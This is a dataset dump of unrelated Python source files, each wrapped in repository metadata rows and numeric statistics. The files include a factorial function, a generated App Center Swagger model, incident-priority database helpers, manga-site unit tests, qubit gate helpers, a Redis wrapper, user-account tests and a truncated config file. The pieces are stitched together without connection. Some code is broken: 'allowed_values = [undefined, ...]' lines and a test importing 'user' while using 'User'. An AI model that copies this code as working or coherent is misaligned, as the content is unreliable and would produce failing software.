| 22.393443 | 65 | 0.614934 | 162 | 1,366 | 4.864198 | 0.512346 | 0.02665 | 0.038071 | 0.053299 | 0.068528 | 0.068528 | 0 | 0 | 0 | 0 | 0 | 0.032393 | 0.299414 | 1,366 | 60 | 66 | 22.766667 | 0.791014 | 0.199122 | 0 | 0.081081 | 0 | 0 | 0.007394 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.162162 | false | 0.081081 | 0.135135 | 0.027027 | 0.648649 | 0.027027 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
d722d3dbdd851da32d3a6d5f6fb12b40e48dbb16 | 227 | py | Python | 2-1_factorial_Q1_recursive.py | Soooyeon-Kim/Algorithm | 28a191d7382d9c3bb6d9afb19f4cff642c3aec03 | [
"MIT"
] | null | null | null | 2-1_factorial_Q1_recursive.py | Soooyeon-Kim/Algorithm | 28a191d7382d9c3bb6d9afb19f4cff642c3aec03 | [
"MIT"
] | null | null | null | 2-1_factorial_Q1_recursive.py | Soooyeon-Kim/Algorithm | 28a191d7382d9c3bb6d9afb19f4cff642c3aec03 | [
"MIT"
] | null | null | null | def factorial(num):
# 재귀함수를 세울 때는 탈출 조건부터 찾는다.
if num <= 1:
return 1
return factorial(num - 1) * num
def main():
print(factorial(5))
# return 120
if __name__ == "__main__":
main() | 17.461538 | 36 | 0.53304 | 30 | 227 | 3.766667 | 0.566667 | 0.212389 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.047297 | 0.348018 | 227 | 13 | 37 | 17.461538 | 0.716216 | 0.154185 | 0 | 0 | 0 | 0 | 0.044944 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.5 | 0.125 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d728c55b4f2bb7d8f35b667f6a550393bb16970f | 16,046 | py | Python | sdks/python/appcenter_sdk/models/InternalHockeyAppCompatibilityResponse.py | Brantone/appcenter-sdks | eeb063ecf79908b6e341fb00196d2cd9dc8f3262 | [
"MIT"
] | null | null | null | sdks/python/appcenter_sdk/models/InternalHockeyAppCompatibilityResponse.py | Brantone/appcenter-sdks | eeb063ecf79908b6e341fb00196d2cd9dc8f3262 | [
"MIT"
] | 6 | 2019-10-23T06:38:53.000Z | 2022-01-22T07:57:58.000Z | sdks/python/appcenter_sdk/models/InternalHockeyAppCompatibilityResponse.py | Brantone/appcenter-sdks | eeb063ecf79908b6e341fb00196d2cd9dc8f3262 | [
"MIT"
] | 2 | 2019-10-23T06:31:05.000Z | 2021-08-21T17:32:47.000Z | # coding: utf-8
"""
App Center Client
Microsoft Visual Studio App Center API # noqa: E501
OpenAPI spec version: preview
Contact: benedetto.abbenanti@gmail.com
Project Repository: https://github.com/b3nab/appcenter-sdks
"""
import pprint
import re # noqa: F401
import six
class InternalHockeyAppCompatibilityResponse(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
allowed enum values
"""
slack = "slack"
teams = "teams"
generic = "generic"
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'owner_type': 'string',
'os': 'string',
'platform': 'string',
'has_crashes': 'boolean',
'has_feedback': 'boolean',
'has_metrics': 'boolean',
'has_external_builds': 'boolean',
'has_specified_build_server_url': 'boolean',
'has_distribution_groups_outside_of_ownership': 'boolean',
'owner_has_distribution_groups': 'boolean',
'bugtracker_type': 'string',
'webhook_types': 'array'
}
attribute_map = {
'owner_type': 'owner_type',
'os': 'os',
'platform': 'platform',
'has_crashes': 'has_crashes',
'has_feedback': 'has_feedback',
'has_metrics': 'has_metrics',
'has_external_builds': 'has_external_builds',
'has_specified_build_server_url': 'has_specified_build_server_url',
'has_distribution_groups_outside_of_ownership': 'has_distribution_groups_outside_of_ownership',
'owner_has_distribution_groups': 'owner_has_distribution_groups',
'bugtracker_type': 'bugtracker_type',
'webhook_types': 'webhook_types'
}
def __init__(self, owner_type=None, os=None, platform=None, has_crashes=None, has_feedback=None, has_metrics=None, has_external_builds=None, has_specified_build_server_url=None, has_distribution_groups_outside_of_ownership=None, owner_has_distribution_groups=None, bugtracker_type=None, webhook_types=None): # noqa: E501
"""InternalHockeyAppCompatibilityResponse - a model defined in Swagger""" # noqa: E501
self._owner_type = None
self._os = None
self._platform = None
self._has_crashes = None
self._has_feedback = None
self._has_metrics = None
self._has_external_builds = None
self._has_specified_build_server_url = None
self._has_distribution_groups_outside_of_ownership = None
self._owner_has_distribution_groups = None
self._bugtracker_type = None
self._webhook_types = None
self.discriminator = None
if owner_type is not None:
self.owner_type = owner_type
if os is not None:
self.os = os
if platform is not None:
self.platform = platform
if has_crashes is not None:
self.has_crashes = has_crashes
if has_feedback is not None:
self.has_feedback = has_feedback
if has_metrics is not None:
self.has_metrics = has_metrics
if has_external_builds is not None:
self.has_external_builds = has_external_builds
if has_specified_build_server_url is not None:
self.has_specified_build_server_url = has_specified_build_server_url
if has_distribution_groups_outside_of_ownership is not None:
self.has_distribution_groups_outside_of_ownership = has_distribution_groups_outside_of_ownership
if owner_has_distribution_groups is not None:
self.owner_has_distribution_groups = owner_has_distribution_groups
if bugtracker_type is not None:
self.bugtracker_type = bugtracker_type
if webhook_types is not None:
self.webhook_types = webhook_types
@property
def owner_type(self):
"""Gets the owner_type of this InternalHockeyAppCompatibilityResponse. # noqa: E501
The owner type of the app # noqa: E501
:return: The owner_type of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: string
"""
return self._owner_type
@owner_type.setter
def owner_type(self, owner_type):
"""Sets the owner_type of this InternalHockeyAppCompatibilityResponse.
The owner type of the app # noqa: E501
:param owner_type: The owner_type of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: string
"""
allowed_values = [undefined, undefined, undefined, ] # noqa: E501
self._owner_type = owner_type
@property
def os(self):
"""Gets the os of this InternalHockeyAppCompatibilityResponse. # noqa: E501
The OS of the app # noqa: E501
:return: The os of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: string
"""
return self._os
@os.setter
def os(self, os):
"""Sets the os of this InternalHockeyAppCompatibilityResponse.
The OS of the app # noqa: E501
:param os: The os of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: string
"""
allowed_values = [undefined, undefined, undefined, ] # noqa: E501
self._os = os
@property
def platform(self):
"""Gets the platform of this InternalHockeyAppCompatibilityResponse. # noqa: E501
The OS of the app # noqa: E501
:return: The platform of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: string
"""
return self._platform
@platform.setter
def platform(self, platform):
"""Sets the platform of this InternalHockeyAppCompatibilityResponse.
The OS of the app # noqa: E501
:param platform: The platform of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: string
"""
allowed_values = [undefined, undefined, undefined, ] # noqa: E501
self._platform = platform
@property
def has_crashes(self):
"""Gets the has_crashes of this InternalHockeyAppCompatibilityResponse. # noqa: E501
Does the HockeyApp app have crashes from within the last 90 days? # noqa: E501
:return: The has_crashes of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: boolean
"""
return self._has_crashes
@has_crashes.setter
def has_crashes(self, has_crashes):
"""Sets the has_crashes of this InternalHockeyAppCompatibilityResponse.
Does the HockeyApp app have crashes from within the last 90 days? # noqa: E501
:param has_crashes: The has_crashes of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: boolean
"""
self._has_crashes = has_crashes
@property
def has_feedback(self):
"""Gets the has_feedback of this InternalHockeyAppCompatibilityResponse. # noqa: E501
Does the HockeyApp app have feedback from within the last 90 days? # noqa: E501
:return: The has_feedback of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: boolean
"""
return self._has_feedback
@has_feedback.setter
def has_feedback(self, has_feedback):
"""Sets the has_feedback of this InternalHockeyAppCompatibilityResponse.
Does the HockeyApp app have feedback from within the last 90 days? # noqa: E501
:param has_feedback: The has_feedback of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: boolean
"""
self._has_feedback = has_feedback
@property
def has_metrics(self):
"""Gets the has_metrics of this InternalHockeyAppCompatibilityResponse. # noqa: E501
Does the HockeyApp app have metrics from within the last 30 days? # noqa: E501
:return: The has_metrics of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: boolean
"""
return self._has_metrics
@has_metrics.setter
def has_metrics(self, has_metrics):
"""Sets the has_metrics of this InternalHockeyAppCompatibilityResponse.
Does the HockeyApp app have metrics from within the last 30 days? # noqa: E501
:param has_metrics: The has_metrics of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: boolean
"""
self._has_metrics = has_metrics
@property
def has_external_builds(self):
"""Gets the has_external_builds of this InternalHockeyAppCompatibilityResponse. # noqa: E501
Does the HockeyApp app have any external builds? # noqa: E501
:return: The has_external_builds of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: boolean
"""
return self._has_external_builds
@has_external_builds.setter
def has_external_builds(self, has_external_builds):
"""Sets the has_external_builds of this InternalHockeyAppCompatibilityResponse.
Does the HockeyApp app have any external builds? # noqa: E501
:param has_external_builds: The has_external_builds of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: boolean
"""
self._has_external_builds = has_external_builds
@property
def has_specified_build_server_url(self):
"""Gets the has_specified_build_server_url of this InternalHockeyAppCompatibilityResponse. # noqa: E501
Does the HockeyApp app have any build server URLs specified? # noqa: E501
:return: The has_specified_build_server_url of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: boolean
"""
return self._has_specified_build_server_url
@has_specified_build_server_url.setter
def has_specified_build_server_url(self, has_specified_build_server_url):
"""Sets the has_specified_build_server_url of this InternalHockeyAppCompatibilityResponse.
Does the HockeyApp app have any build server URLs specified? # noqa: E501
:param has_specified_build_server_url: The has_specified_build_server_url of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: boolean
"""
self._has_specified_build_server_url = has_specified_build_server_url
@property
def has_distribution_groups_outside_of_ownership(self):
"""Gets the has_distribution_groups_outside_of_ownership of this InternalHockeyAppCompatibilityResponse. # noqa: E501
Does the HockeyApp app have an associated Distribution Group that is owned by a different owner? # noqa: E501
:return: The has_distribution_groups_outside_of_ownership of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: boolean
"""
return self._has_distribution_groups_outside_of_ownership
@has_distribution_groups_outside_of_ownership.setter
def has_distribution_groups_outside_of_ownership(self, has_distribution_groups_outside_of_ownership):
"""Sets the has_distribution_groups_outside_of_ownership of this InternalHockeyAppCompatibilityResponse.
Does the HockeyApp app have an associated Distribution Group that is owned by a different owner? # noqa: E501
:param has_distribution_groups_outside_of_ownership: The has_distribution_groups_outside_of_ownership of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: boolean
"""
self._has_distribution_groups_outside_of_ownership = has_distribution_groups_outside_of_ownership
@property
def owner_has_distribution_groups(self):
"""Gets the owner_has_distribution_groups of this InternalHockeyAppCompatibilityResponse. # noqa: E501
Does the HockeyApp app's owner own any Distribution Groups? # noqa: E501
:return: The owner_has_distribution_groups of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: boolean
"""
return self._owner_has_distribution_groups
@owner_has_distribution_groups.setter
def owner_has_distribution_groups(self, owner_has_distribution_groups):
"""Sets the owner_has_distribution_groups of this InternalHockeyAppCompatibilityResponse.
Does the HockeyApp app's owner own any Distribution Groups? # noqa: E501
:param owner_has_distribution_groups: The owner_has_distribution_groups of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: boolean
"""
self._owner_has_distribution_groups = owner_has_distribution_groups
@property
def bugtracker_type(self):
"""Gets the bugtracker_type of this InternalHockeyAppCompatibilityResponse. # noqa: E501
Does the HockeyApp app have any bugtracker configured? Which type? # noqa: E501
:return: The bugtracker_type of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: string
"""
return self._bugtracker_type
@bugtracker_type.setter
def bugtracker_type(self, bugtracker_type):
"""Sets the bugtracker_type of this InternalHockeyAppCompatibilityResponse.
Does the HockeyApp app have any bugtracker configured? Which type? # noqa: E501
:param bugtracker_type: The bugtracker_type of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: string
"""
allowed_values = [undefined, undefined, undefined, ] # noqa: E501
self._bugtracker_type = bugtracker_type
@property
def webhook_types(self):
"""Gets the webhook_types of this InternalHockeyAppCompatibilityResponse. # noqa: E501
Does the HockeyApp app have any webhooks configured? Which types? # noqa: E501
:return: The webhook_types of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:rtype: array
"""
return self._webhook_types
@webhook_types.setter
def webhook_types(self, webhook_types):
"""Sets the webhook_types of this InternalHockeyAppCompatibilityResponse.
Does the HockeyApp app have any webhooks configured? Which types? # noqa: E501
:param webhook_types: The webhook_types of this InternalHockeyAppCompatibilityResponse. # noqa: E501
:type: array
"""
self._webhook_types = webhook_types
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, InternalHockeyAppCompatibilityResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 37.316279 | 325 | 0.680294 | 1,798 | 16,046 | 5.804227 | 0.092325 | 0.051361 | 0.202376 | 0.165581 | 0.732081 | 0.655711 | 0.612112 | 0.577808 | 0.489747 | 0.403603 | 0 | 0.018409 | 0.251838 | 16,046 | 429 | 326 | 37.403263 | 0.850895 | 0.44441 | 0 | 0.100559 | 0 | 0 | 0.095488 | 0.04053 | 0 | 0 | 0 | 0 | 0 | 1 | 0.167598 | false | 0 | 0.01676 | 0 | 0.318436 | 0.011173 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d72b1da8920d5a9113865f0b4d64b0fa86860726 | 2,421 | py | Python | src/dispatch/incident_priority/service.py | mclueppers/dispatch | b9e524ca10e5b2e95490b388db61c58e79e975e2 | [
"Apache-2.0"
] | 1 | 2022-02-23T02:42:10.000Z | 2022-02-23T02:42:10.000Z | src/dispatch/incident_priority/service.py | mclueppers/dispatch | b9e524ca10e5b2e95490b388db61c58e79e975e2 | [
"Apache-2.0"
] | 1 | 2021-04-30T21:36:14.000Z | 2021-04-30T21:36:14.000Z | src/dispatch/incident_priority/service.py | AlexaKelley/dispatch | b46d8416a0e4ec9badb76f6f3d1765c6093203f8 | [
"Apache-2.0"
] | 1 | 2021-04-08T10:02:57.000Z | 2021-04-08T10:02:57.000Z | from typing import List, Optional
from fastapi.encoders import jsonable_encoder
from sqlalchemy.sql.expression import true
from .models import IncidentPriority, IncidentPriorityCreate, IncidentPriorityUpdate
def get(*, db_session, incident_priority_id: int) -> Optional[IncidentPriority]:
"""Returns an incident priority based on the given priority id."""
return (
db_session.query(IncidentPriority)
.filter(IncidentPriority.id == incident_priority_id)
.one_or_none()
)
def get_default(*, db_session):
"""Returns the current default incident_priority."""
return (
db_session.query(IncidentPriority).filter(IncidentPriority.default == true()).one_or_none()
)
def get_by_name(*, db_session, name: str) -> Optional[IncidentPriority]:
"""Returns an incident priority based on the given priority name."""
return db_session.query(IncidentPriority).filter(IncidentPriority.name == name).one_or_none()
def get_by_slug(*, db_session, slug: str) -> Optional[IncidentPriority]:
"""Returns an incident priority based on the given type slug."""
return db_session.query(IncidentPriority).filter(IncidentPriority.slug == slug).one_or_none()
def get_all(*, db_session) -> List[Optional[IncidentPriority]]:
"""Returns all incident priorities."""
return db_session.query(IncidentPriority)
def create(*, db_session, incident_priority_in: IncidentPriorityCreate) -> IncidentPriority:
"""Creates an incident priority."""
incident_priority = IncidentPriority(**incident_priority_in.dict())
db_session.add(incident_priority)
db_session.commit()
return incident_priority
def update(
*, db_session, incident_priority: IncidentPriority, incident_priority_in: IncidentPriorityUpdate
) -> IncidentPriority:
"""Updates an incident priority."""
incident_priority_data = jsonable_encoder(incident_priority)
update_data = incident_priority_in.dict(skip_defaults=True)
for field in incident_priority_data:
if field in update_data:
setattr(incident_priority, field, update_data[field])
db_session.add(incident_priority)
db_session.commit()
return incident_priority
def delete(*, db_session, incident_priority_id: int):
"""Deletes an incident priority."""
db_session.query(IncidentPriority).filter(IncidentPriority.id == incident_priority_id).delete()
db_session.commit()
| 35.602941 | 100 | 0.748451 | 279 | 2,421 | 6.250896 | 0.225806 | 0.229358 | 0.061927 | 0.103211 | 0.565367 | 0.497706 | 0.386468 | 0.283257 | 0.283257 | 0.283257 | 0 | 0 | 0.149525 | 2,421 | 67 | 101 | 36.134328 | 0.847013 | 0.145394 | 0 | 0.230769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.205128 | false | 0 | 0.102564 | 0 | 0.487179 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d72ddd086f69dbbd5f9fa1618ec9586c8a562c0f | 591 | py | Python | mangopi/tests/site/test_mangaFox.py | BFTeck/mangopi | 8598c8b35c38f9bf2a0880c93af5c1d3ae5728be | [
"MIT"
] | 24 | 2015-01-03T00:47:06.000Z | 2020-11-27T14:58:32.000Z | mangopi/tests/site/test_mangaFox.py | BFTeck/mangopi | 8598c8b35c38f9bf2a0880c93af5c1d3ae5728be | [
"MIT"
] | 4 | 2015-03-14T14:00:21.000Z | 2020-12-30T07:15:20.000Z | mangopi/tests/site/test_mangaFox.py | BFTeck/mangopi | 8598c8b35c38f9bf2a0880c93af5c1d3ae5728be | [
"MIT"
] | 5 | 2015-02-04T00:44:08.000Z | 2018-08-13T21:59:47.000Z | from unittest import TestCase
from mangopi.site.mangafox import MangaFox
class TestMangaFox(TestCase):
SERIES = MangaFox.series('gantz')
CHAPTERS = SERIES.chapters
def test_chapter_count(self):
self.assertEqual(len(TestMangaFox.CHAPTERS), 386)
def test_chapter_title(self):
self.assertEqual(TestMangaFox.CHAPTERS[-2].title, 'Lightning Counterstrike')
def test_chapter_pages(self):
self.assertEqual(len(TestMangaFox.CHAPTERS[0].pages), 43)
def test_for_image_url(self):
self.assertIsNone(TestMangaFox.CHAPTERS[0].pages[0].image)
| 28.142857 | 84 | 0.732657 | 71 | 591 | 5.971831 | 0.43662 | 0.066038 | 0.099057 | 0.103774 | 0.198113 | 0.198113 | 0 | 0 | 0 | 0 | 0 | 0.018145 | 0.160745 | 591 | 20 | 85 | 29.55 | 0.836694 | 0 | 0 | 0 | 0 | 0 | 0.047377 | 0 | 0 | 0 | 0 | 0 | 0.307692 | 1 | 0.307692 | false | 0 | 0.153846 | 0 | 0.692308 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
d736949b59153dcc0e4c4d3472e58423cffa5c71 | 754 | py | Python | circuit_mapper/gate_1_qubit.py | quantumgenetics/quantumgenetics | 630ae5a47c887ecf7a3b4ad62de0d58dc944a42d | [
"Apache-2.0"
] | 6 | 2019-11-09T16:59:29.000Z | 2021-03-27T03:20:24.000Z | circuit_mapper/gate_1_qubit.py | quantumgenetics/quantumgenetics | 630ae5a47c887ecf7a3b4ad62de0d58dc944a42d | [
"Apache-2.0"
] | null | null | null | circuit_mapper/gate_1_qubit.py | quantumgenetics/quantumgenetics | 630ae5a47c887ecf7a3b4ad62de0d58dc944a42d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
from functools import partial
def combine(qubit_count, gates):
return [partial(g, i) for g in gates for i in range(qubit_count)]
def repeat_none(index, count):
return [partial(apply_none, index)] * count
def apply_none(index, circuit):
pass
def apply_not(index, circuit):
qr = circuit.qregs[0]
circuit.x(qr[index])
def apply_phase_flip(index, circuit):
qr = circuit.qregs[0]
circuit.z(qr[index])
def apply_hadamard(index, circuit):
qr = circuit.qregs[0]
circuit.h(qr[index])
def apply_y_rotation(theta, index, circuit):
qr = circuit.qregs[0]
circuit.ry(theta, qr[index])
def apply_z_rotation(phi, index, circuit):
qr = circuit.qregs[0]
circuit.rz(phi, qr[index])
| 18.85 | 69 | 0.68435 | 116 | 754 | 4.336207 | 0.353448 | 0.095427 | 0.139165 | 0.208748 | 0.337972 | 0.337972 | 0.337972 | 0 | 0 | 0 | 0 | 0.009756 | 0.18435 | 754 | 39 | 70 | 19.333333 | 0.80813 | 0.027851 | 0 | 0.227273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.363636 | false | 0.045455 | 0.045455 | 0.090909 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d7442cc25fd608f9e2b752fac226f3d226409445 | 273 | py | Python | MANN/Utils/similarities.py | jgyllinsky/How-to-Learn-from-Little-Data | 3b7b481ac8aa376540a2ca1fff7046de9f86dad6 | [
"MIT"
] | 161 | 2017-05-06T01:37:30.000Z | 2021-12-15T09:58:26.000Z | MANN/Utils/similarities.py | jgyllinsky/How-to-Learn-from-Little-Data | 3b7b481ac8aa376540a2ca1fff7046de9f86dad6 | [
"MIT"
] | 8 | 2017-05-08T20:00:51.000Z | 2018-05-28T01:16:30.000Z | MANN/Utils/similarities.py | jgyllinsky/How-to-Learn-from-Little-Data | 3b7b481ac8aa376540a2ca1fff7046de9f86dad6 | [
"MIT"
] | 78 | 2017-05-06T03:27:31.000Z | 2020-12-21T17:24:20.000Z | import tensorflow as tf
def cosine_similarity(x, y, eps=1e-6):
z = tf.batch_matmul(x, tf.transpose(y, perm=[0,2,1]))
z /= tf.sqrt(tf.multiply(tf.expand_dims(tf.reduce_sum(tf.multiply(x,x), 2), 2),tf.expand_dims(tf.reduce_sum(tf.multiply(y,y), 2), 1)) + eps)
return z
| 34.125 | 141 | 0.688645 | 56 | 273 | 3.25 | 0.482143 | 0.164835 | 0.131868 | 0.153846 | 0.362637 | 0.362637 | 0.362637 | 0.362637 | 0 | 0 | 0 | 0.037037 | 0.10989 | 273 | 7 | 142 | 39 | 0.711934 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
d74c74f32a5497e7e19bbaa47aa3d3f1d06f9e90 | 848 | py | Python | src/home_automation_hub/storage.py | levidavis/py-home | 3cc30e19d506824de9816ad9dbcfba4338a7dfa8 | [
"MIT"
] | 26 | 2018-08-21T19:54:21.000Z | 2021-10-15T18:59:17.000Z | src/home_automation_hub/storage.py | levidavis/py-home | 3cc30e19d506824de9816ad9dbcfba4338a7dfa8 | [
"MIT"
] | 3 | 2020-01-23T03:54:24.000Z | 2020-07-19T13:10:22.000Z | src/home_automation_hub/storage.py | levidavis/py-home | 3cc30e19d506824de9816ad9dbcfba4338a7dfa8 | [
"MIT"
] | 11 | 2018-09-18T21:31:11.000Z | 2021-07-03T11:23:30.000Z | import redis
import json
from . import config
redis_instance = None
def set_up(host, port, db):
global redis_instance
redis_instance = redis.StrictRedis(host=host, port=port, db=db)
class ModuleStorage():
def __init__(self, module_id):
self.key_prefix = "module:" + config.config.enabled_modules[module_id]["storage_prefix"]
@property
def redis(self):
return redis_instance
def prefixed_key(self, key):
return f"{self.key_prefix}:{key}"
def get(self, key):
data_json = redis_instance.get(self.prefixed_key(key))
if not data_json:
return None
data = json.loads(data_json)
return data.get("data")
def set(self, key, value):
data_json = json.dumps({"data": value})
return redis_instance.set(self.prefixed_key(key), data_json)
| 24.941176 | 96 | 0.659198 | 115 | 848 | 4.643478 | 0.321739 | 0.146067 | 0.067416 | 0.067416 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.228774 | 848 | 33 | 97 | 25.69697 | 0.816514 | 0 | 0 | 0 | 0 | 0 | 0.061321 | 0.027123 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.125 | 0.083333 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
d74ea2281107cf74e2034caf7b92932a4e11e640 | 1,904 | py | Python | user_Test.py | Robertokello11/Password-Locker | 23afa9b2748044b523e33660e45f934a90d88328 | [
"MIT"
] | null | null | null | user_Test.py | Robertokello11/Password-Locker | 23afa9b2748044b523e33660e45f934a90d88328 | [
"MIT"
] | null | null | null | user_Test.py | Robertokello11/Password-Locker | 23afa9b2748044b523e33660e45f934a90d88328 | [
"MIT"
] | null | null | null | import unittest #Import unittest module
from user import user # importing the contact class
class TestUser(unittest.TestCase):
def setUp(self):
'''
method to run before each test
'''
self.new_user=User("Robert", "Robert11") #new User created
def tearDown(self):
'''
clean up to prevent errors
'''
User.user_list = []
# Test 2 ##
def test__init(self):
'''
check if class is initialiazing as expected
'''
self.assertEqual(self.new_user.username, "Robert")
self.assertEqual(self.new_user.password, "Robert11")
def test_save_user(self):
'''
confirm if the user information can be saved
in the user list
'''
self.new_user.save_user()
self.assertEqual(len(User.user_list), 1)
# 3rd test ## saving users ##
def test_save_mutliple_users(self):
'''
check whether you can store more than one user
'''
self.new_user.save_user()
test_user = User("test", "password")
test_user.save_user()
self.assertEqual(len(User.user_list), 2)
#4th test## Delete user ##
def test_delete_user(self):
'''
check whether one can delete a user account
'''
self.new_user.save_user()
test_user = User("test", "password")
test_user.save_user()
self.new_user.delete_user()
self.assertEqual(len(User.user_list), 1)
##5th test#
def test_find_user(self):
'''
find a user using username
'''
self.new_user.save_user()
test_user = User("test", "password")
test_user.save_user()
found_user = User.find_user("Robert")
self.assertEqual(found_user.username, self.new_user.username)
if __name__ == '__main__':
unittest.main()
| 25.72973 | 69 | 0.581408 | 231 | 1,904 | 4.580087 | 0.30303 | 0.066163 | 0.093573 | 0.056711 | 0.328923 | 0.273157 | 0.273157 | 0.273157 | 0.23913 | 0.174858 | 0 | 0.008352 | 0.308298 | 1,904 | 74 | 70 | 25.72973 | 0.794989 | 0.216912 | 0 | 0.375 | 0 | 0 | 0.059816 | 0 | 0 | 0 | 0 | 0 | 0.1875 | 1 | 0.21875 | false | 0.125 | 0.0625 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
d75a122a7b1520cc30ff7d383f0593e9eebe913f | 2,260 | py | Python | src/utils/config.py | cpaismz89/DeepFireTopology | 9cfe7c5ed9997a2a89b7405af47d9991da7d5471 | [
"MIT"
] | null | null | null | src/utils/config.py | cpaismz89/DeepFireTopology | 9cfe7c5ed9997a2a89b7405af47d9991da7d5471 | [
"MIT"
] | null | null | null | src/utils/config.py | cpaismz89/DeepFireTopology | 9cfe7c5ed9997a2a89b7405af47d9991da7d5471 | [
"MIT"
] | null | null | null | # Run Keras on CPU
import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = " " # -1 if CPU
# Importations
from IPython.display import Image
# Compressed pickle
import pickle
from compress_pickle import dump as cdump
